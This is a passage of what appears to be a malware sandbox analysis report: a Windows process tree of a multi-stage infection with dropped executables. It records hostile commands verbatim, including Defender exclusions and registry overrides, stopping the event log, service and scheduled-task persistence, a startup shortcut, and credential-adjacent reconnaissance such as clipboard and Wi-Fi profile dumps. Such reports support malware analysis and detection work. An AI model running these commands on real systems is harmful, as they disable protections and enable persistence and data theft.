      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1980,12210430892104414968,10883891373041401253,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
        6⤵
        
        PID:1948
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1980,12210430892104414968,10883891373041401253,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2576 /prefetch:8
        6⤵
        
        PID:3060
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12210430892104414968,10883891373041401253,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
        6⤵
        
        PID:5324
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12210430892104414968,10883891373041401253,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
        6⤵
        
        PID:5332
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12210430892104414968,10883891373041401253,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1
        6⤵
        
        PID:5972
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12210430892104414968,10883891373041401253,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4560 /prefetch:1
        6⤵
        
        PID:5980
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12210430892104414968,10883891373041401253,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
        6⤵
        
        PID:5160
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,12210430892104414968,10883891373041401253,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
        6⤵
        
        PID:3472
      - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,12210430892104414968,10883891373041401253,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 /prefetch:8
        6⤵
        
        PID:5944
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1980,12210430892104414968,10883891373041401253,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4632 /prefetch:8
        6⤵
        
        PID:1488
  - - C:\Users\Admin\AppData\Local\Temp\1000153001\Freshbuild.exe
      "C:\Users\Admin\AppData\Local\Temp\1000153001\Freshbuild.exe"
      4⤵
      PID:3900
    - - C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
        5⤵
        
        PID:4464
      - C:\Users\Admin\AppData\Local\Temp\1000037001\1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000037001\1.exe"
        6⤵
        
        PID:4652
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 488
        7⤵
        Program crash
        
        PID:3420
      - C:\Users\Admin\AppData\Local\Temp\1000038001\Bitwarden-Installer-2024.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000038001\Bitwarden-Installer-2024.exe"
        6⤵
        
        PID:5788
  - - C:\Users\Admin\AppData\Local\Temp\1000160001\leg222.exe
      "C:\Users\Admin\AppData\Local\Temp\1000160001\leg222.exe"
      4⤵
      PID:1472
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:2480
      - C:\Users\Admin\AppData\Roaming\iZZkMkpxrP.exe
        
        "C:\Users\Admin\AppData\Roaming\iZZkMkpxrP.exe"
        6⤵
        
        PID:2628
      - C:\Users\Admin\AppData\Roaming\pkNjJtUof5.exe
        
        "C:\Users\Admin\AppData\Roaming\pkNjJtUof5.exe"
        6⤵
        
        PID:2012
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1472 -s 240
        5⤵
        Program crash
        
        PID:4568
  - - C:\Users\Admin\AppData\Local\Temp\1000161001\build1555.exe
      "C:\Users\Admin\AppData\Local\Temp\1000161001\build1555.exe"
      4⤵
      PID:6036
    - - C:\Users\Admin\AppData\Local\Temp\onefile_6036_133646717417438562\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000161001\build1555.exe"
        5⤵
        
        PID:3160
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:5488
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:5872
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:5996
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:6120
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:5984
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
        6⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:6124
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5300
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
        6⤵
        
        PID:5244
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        6⤵
        
        PID:1064
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:5648
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:5600
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:3324
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        6⤵
        
        PID:5592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        7⤵
        
        PID:6004
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        6⤵
        
        PID:3452
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:2084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        6⤵
        
        PID:5088
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:6104
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        6⤵
        
        PID:6044
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:5964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        6⤵
        
        PID:2704
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:5568
  - - C:\Users\Admin\AppData\Local\Temp\1000169001\surfshark.exe
      "C:\Users\Admin\AppData\Local\Temp\1000169001\surfshark.exe"
      4⤵
      PID:5924
- C:\Users\Admin\Documents\SimpleAdobe\nu4h36FFh40oIiRbiejGkqCz.exe
  C:\Users\Admin\Documents\SimpleAdobe\nu4h36FFh40oIiRbiejGkqCz.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:3112
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\FBFHDBKJEG.exe"
    3⤵
    PID:3844
  - - C:\Users\Admin\AppData\Local\Temp\FBFHDBKJEG.exe
      "C:\Users\Admin\AppData\Local\Temp\FBFHDBKJEG.exe"
      4⤵
      PID:2408
    - - C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"
        5⤵
        
        PID:4360
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\CBKJJEHCBA.exe"
    3⤵
    PID:4524
- C:\Users\Admin\Documents\SimpleAdobe\DEZCEGAbwf5CapWebIrDjz3j.exe
  C:\Users\Admin\Documents\SimpleAdobe\DEZCEGAbwf5CapWebIrDjz3j.exe
  2⤵
  - Executes dropped EXE
  PID:764
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    PID:4328
- C:\Users\Admin\Documents\SimpleAdobe\sERjXfHueAS8ehkm4SYW_I1w.exe
  C:\Users\Admin\Documents\SimpleAdobe\sERjXfHueAS8ehkm4SYW_I1w.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3536
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4108
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3536 -s 320
    3⤵
    - Program crash
    PID:1644
- C:\Users\Admin\Documents\SimpleAdobe\6nHwEM9LPdfXeMjcLj0sF9Vg.exe
  C:\Users\Admin\Documents\SimpleAdobe\6nHwEM9LPdfXeMjcLj0sF9Vg.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4948
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:3940
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:1824
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:3000
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:556
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:2104
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:3332
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1600
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:4820
- C:\Users\Admin\Documents\SimpleAdobe\yGrIl__IkGJ1gKckfHLtlnal.exe
  C:\Users\Admin\Documents\SimpleAdobe\yGrIl__IkGJ1gKckfHLtlnal.exe
  2⤵
  - Executes dropped EXE
  PID:4860
- - C:\Users\Admin\AppData\Local\Temp\7zS383D.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    PID:2936
  - - C:\Users\Admin\AppData\Local\Temp\7zS4ABB.tmp\Install.exe
      .\Install.exe /Tdiduy "525403" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      PID:2112
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:3184
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:3000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3844
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:1968
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bYIjjyXTgczhZAJGMW" /SC once /ST 16:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS4ABB.tmp\Install.exe\" om /cdidwRF 525403 /S" /V1 /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2184
- C:\Users\Admin\Documents\SimpleAdobe\XOenkRQWGcYuj11PpY3xnsxM.exe
  C:\Users\Admin\Documents\SimpleAdobe\XOenkRQWGcYuj11PpY3xnsxM.exe
  2⤵
  - Executes dropped EXE
  PID:3340
- - C:\Users\Admin\AppData\Local\Temp\7zS38AA.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    PID:3168
  - - C:\Users\Admin\AppData\Local\Temp\7zS484A.tmp\Install.exe
      .\Install.exe /vdidI "385132" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      PID:4420
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:3560
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1176
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:3276
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bhSAnxpmVrgvBYDGBw" /SC once /ST 16:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS484A.tmp\Install.exe\" UV /SdidG 385132 /S" /V1 /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1492
- C:\Users\Admin\Documents\SimpleAdobe\2VaeY0gFivcCXCsHFUqxArRX.exe
  C:\Users\Admin\Documents\SimpleAdobe\2VaeY0gFivcCXCsHFUqxArRX.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3548
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:2084
  - - C:\ProgramData\BKJDGCGDAA.exe
      "C:\ProgramData\BKJDGCGDAA.exe"
      4⤵
      PID:5612
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:5696
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 280
        5⤵
        Program crash
        
        PID:5844
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKKFCFBKFCFB" & exit
      4⤵
      PID:3156
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:5376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3560 -ip 3560
1⤵
PID:1772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3536 -ip 3536
1⤵
PID:1116

C:\Windows\SysWOW64\cbadwdrv\kawlgywe.exe
C:\Windows\SysWOW64\cbadwdrv\kawlgywe.exe /d"C:\Users\Admin\Documents\SimpleAdobe\KCx7eBObp2OYRk87KXCb_fWw.exe"
1⤵
PID:2700
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:3852
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 560
  2⤵
  - Program crash
  PID:4464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4268 -ip 4268
1⤵
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2996 -ip 2996
1⤵
PID:3900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2700 -ip 2700
1⤵
PID:3808

C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VitaLink.url" & echo URL="C:\Users\Admin\AppData\Local\VitaConnect Innovations\VitaLink.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VitaLink.url" & exit
1⤵
PID:4564

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
PID:4592
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1920
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3328
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:3112
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3384
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2308
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:3948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1472 -ip 1472
1⤵
PID:3696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4652 -ip 4652
1⤵
PID:668

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5200

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5612 -ip 5612
1⤵
PID:5764

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
PID:436

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
1⤵
PID:2012

C:\Users\Admin\AppData\Local\Temp\7zS484A.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS484A.tmp\Install.exe UV /SdidG 385132 /S
1⤵
PID:5748

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
PID:5712

C:\Users\Admin\AppData\Local\Temp\7zS4ABB.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS4ABB.tmp\Install.exe om /cdidwRF 525403 /S
1⤵
PID:5780
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5908
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:948
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\reg.exe
